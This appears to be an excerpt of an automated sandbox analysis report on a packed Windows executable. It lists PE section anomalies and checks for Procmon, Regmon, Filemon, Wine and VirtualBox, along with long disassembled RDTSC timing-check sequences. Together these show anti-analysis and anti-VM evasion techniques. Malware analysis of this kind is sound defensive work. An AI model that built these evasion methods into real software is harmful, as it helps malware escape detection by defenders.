    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Qyk8RJnGN7.exeStatic file information: File size 2930176 > 1048576
    Source: Qyk8RJnGN7.exeStatic PE information: Raw size of tjdrfttm is bigger than: 0x100000 < 0x29a200

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeUnpacked PE file: 0.2.Qyk8RJnGN7.exe.c90000.0.unpack :EW;.rsrc:W;.idata :W;tjdrfttm:EW;msexgfdi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tjdrfttm:EW;msexgfdi:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: Qyk8RJnGN7.exeStatic PE information: real checksum: 0x2d58d3 should be: 0x2d76de
    Source: Qyk8RJnGN7.exeStatic PE information: section name:
    Source: Qyk8RJnGN7.exeStatic PE information: section name: .idata
    Source: Qyk8RJnGN7.exeStatic PE information: section name: tjdrfttm
    Source: Qyk8RJnGN7.exeStatic PE information: section name: msexgfdi
    Source: Qyk8RJnGN7.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_0150F4F0 push cs; retf 0_3_0150F4F1
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_0150A3EC push es; iretd 0_3_0150A46C
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_0150D610 push edx; iretd 0_3_0150D611
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014D0CBF push esi; retf 0_3_014D0CCA
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014D0CBF push esi; retf 0_3_014D0CCA
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014D0CBF push esi; retf 0_3_014D0CCA
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014D0CBF push esi; retf 0_3_014D0CCA
    Source: Qyk8RJnGN7.exeStatic PE information: section name: entropy: 7.982701324787569

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: CF6686 second address: CF5EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F0BACBDA1A3h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 ja 00007F0BACBDA19Ch 0x0000001b sbb ecx, 17BF47C9h 0x00000021 popad 0x00000022 push dword ptr [ebp+122D0579h] 0x00000028 sub dword ptr [ebp+122D1CCEh], esi 0x0000002e call dword ptr [ebp+122D31A9h] 0x00000034 pushad 0x00000035 sub dword ptr [ebp+122D1E1Bh], ebx 0x0000003b or dword ptr [ebp+122D1E1Bh], ecx 0x00000041 xor eax, eax 0x00000043 jnl 00007F0BACBDA1A9h 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d cld 0x0000004e mov dword ptr [ebp+122D2DEBh], eax 0x00000054 cld 0x00000055 mov esi, 0000003Ch 0x0000005a js 00007F0BACBDA1A6h 0x00000060 jmp 00007F0BACBDA1A0h 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 sub dword ptr [ebp+122D1E1Bh], eax 0x0000006f lodsw 0x00000071 jmp 00007F0BACBDA19Ch 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D332Ch], edx 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 pushad 0x00000085 xor dx, FF16h 0x0000008a jnl 00007F0BACBDA1A8h 0x00000090 popad 0x00000091 push eax 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 push esi 0x00000096 pop esi 0x00000097 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EB9 second address: E64EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EBD second address: E64EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EC3 second address: E64EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EC8 second address: E64EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0BACBDA196h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jl 00007F0BACBDA196h 0x00000017 jp 00007F0BACBDA196h 0x0000001d jnc 00007F0BACBDA196h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EF0 second address: E64EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E651CB second address: E651D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E65485 second address: E65489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E6791F second address: E67928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67928 second address: CF5EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F0BACBDA3E1h 0x0000000d push dword ptr [ebp+122D0579h] 0x00000013 mov dword ptr [ebp+12441B2Fh], edi 0x00000019 call dword ptr [ebp+122D31A9h] 0x0000001f pushad 0x00000020 sub dword ptr [ebp+122D1E1Bh], ebx 0x00000026 or dword ptr [ebp+122D1E1Bh], ecx 0x0000002c xor eax, eax 0x0000002e jnl 00007F0BACBDA3E9h 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 cld 0x00000039 mov dword ptr [ebp+122D2DEBh], eax 0x0000003f cld 0x00000040 mov esi, 0000003Ch 0x00000045 js 00007F0BACBDA3E6h 0x0000004b jmp 00007F0BACBDA3E0h 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 sub dword ptr [ebp+122D1E1Bh], eax 0x0000005a lodsw 0x0000005c jmp 00007F0BACBDA3DCh 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D332Ch], edx 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f pushad 0x00000070 xor dx, FF16h 0x00000075 jnl 00007F0BACBDA3E8h 0x0000007b call 00007F0BACBDA3E1h 0x00000080 pop ecx 0x00000081 popad 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push esi 0x00000087 pop esi 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67962 second address: E67989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F0BACBDA1AEh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67B6F second address: E67B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C5E second address: E67C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C62 second address: E67C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C68 second address: E67C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C6E second address: E67C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C72 second address: E67C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C76 second address: E67CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 43BA3CD6h 0x0000000f push edi 0x00000010 call 00007F0BACBDA3E9h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop edx 0x00000019 push 00000003h 0x0000001b movzx edx, si 0x0000001e push 00000000h 0x00000020 jmp 00007F0BACBDA3DCh 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F0BACBDA3D8h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 movsx ecx, di 0x00000044 push AA8B8262h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d pop eax 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67CE6 second address: E67D51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0BACBDA19Bh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 15747D9Eh 0x00000012 pushad 0x00000013 movzx eax, dx 0x00000016 mov ebx, dword ptr [ebp+122D20C7h] 0x0000001c popad 0x0000001d lea ebx, dword ptr [ebp+1244581Ah] 0x00000023 push ecx 0x00000024 mov edx, dword ptr [ebp+122D334Eh] 0x0000002a pop ecx 0x0000002b jmp 00007F0BACBDA1A7h 0x00000030 xchg eax, ebx 0x00000031 jg 00007F0BACBDA19Ah 0x00000037 push esi 0x00000038 pushad 0x00000039 popad 0x0000003a pop esi 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F0BACBDA1A5h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E889DE second address: E88A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F0BACBDA3E2h 0x0000000b je 00007F0BACBDA3D6h 0x00000011 jp 00007F0BACBDA3D6h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jno 00007F0BACBDA3D6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF67 second address: E5AF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF6F second address: E5AF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF73 second address: E5AF87 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BACBDA196h 0x00000008 jnc 00007F0BACBDA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF87 second address: E5AFAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DCh 0x00000007 jmp 00007F0BACBDA3DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jns 00007F0BACBDA3D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86AC2 second address: E86AD3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BACBDA198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86AD3 second address: E86AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86D88 second address: E86D9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push esi 0x0000000f jne 00007F0BACBDA196h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86D9F second address: E86DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA3E7h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86F5D second address: E86F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E871D7 second address: E871DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E871DC second address: E871F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jl 00007F0BACBDA196h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E871F4 second address: E871FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87554 second address: E8755A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8755A second address: E8756C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F0BACBDA3DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E876AF second address: E876B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87A7E second address: E87A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BE9 second address: E87BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BEE second address: E87BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BF4 second address: E87BFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BFA second address: E87C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F0BACBDA3E2h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E88180 second address: E8818B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8818B second address: E88193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E88193 second address: E88198 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E88588 second address: E8858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8B6DE second address: E8B6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F0BACBDA196h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8A4EB second address: E8A4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8BD83 second address: E8BDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F0BACBDA19Ch 0x0000000b jne 00007F0BACBDA196h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 jmp 00007F0BACBDA19Ch 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push ebx 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8CFCD second address: E8CFD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8CFD4 second address: E8CFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8CFDA second address: E8D01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0BACBDA3E8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jne 00007F0BACBDA3D6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0BACBDA3E4h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E946D5 second address: E946E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0BACBDA196h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9481C second address: E9482C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F0BACBDA3D6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94955 second address: E9498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 je 00007F0BACBDA1ABh 0x0000000d pushad 0x0000000e js 00007F0BACBDA196h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007F0BACBDA196h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9498E second address: E94999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94999 second address: E9499F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94DDD second address: E94DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94DE3 second address: E94DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA19Ah 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94DF2 second address: E94E0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F0BACBDA3D6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F0BACBDA3D6h 0x00000017 jp 00007F0BACBDA3D6h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E950CF second address: E950DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E950DA second address: E950E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jns 00007F0BACBDA3DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5FEF5 second address: E5FF11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007F0BACBDA1A2h 0x0000000e pop ecx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5FF11 second address: E5FF17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5FF17 second address: E5FF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
